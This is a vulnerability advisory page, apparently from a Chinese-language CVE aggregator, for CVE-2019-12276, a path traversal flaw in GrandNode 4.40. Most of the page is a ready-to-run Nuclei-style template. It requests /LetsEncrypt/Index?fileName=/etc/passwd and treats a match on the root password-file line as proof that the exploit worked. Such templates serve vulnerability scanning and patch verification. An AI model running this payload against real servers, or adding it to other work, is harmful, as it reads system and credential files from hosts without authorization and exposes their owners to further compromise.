CVE-2019-12276: GrandNode 4.40 - Local File Inclusion

日期: 2025-08-01 | 影响软件: GrandNode | POC: 已公开

漏洞描述

GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.

PoC代码[已公开]

id: CVE-2019-12276

info:
  name: GrandNode 4.40 - Local File Inclusion
  author: daffainfo
  severity: high
  description: |
    GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the entire system.
  remediation: |
    A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
  reference:
    - https://security401.com/grandnode-path-traversal/
    - https://grandnode.com
    - https://github.com/grandnode/grandnode
    - https://nvd.nist.gov/vuln/detail/CVE-2019-12276
    - http://packetstormsecurity.com/files/153373/GrandNode-4.40-Path-Traversal-File-Download.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-12276
    cwe-id: CWE-22
    epss-score: 0.89074
    epss-percentile: 0.99513
    cpe: cpe:2.3:a:grandnode:grandnode:4.40:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: grandnode
    product: grandnode
  tags: cve,cve2019,packetstorm,lfi,grandnode

http:
  - method: GET
    path:
      - "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"

    headers:
      Connection: close

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f538f457bb4d40fd8cf59558f94bdf80dfd58a7ed5738a68cf4cb1805399b67c022050389251528f6d7d737bdddde839f0f710ffbc10a58a5b6895fe72cfed5fcfaa:922c64590222798bb761d5b6d8e72950

相关漏洞推荐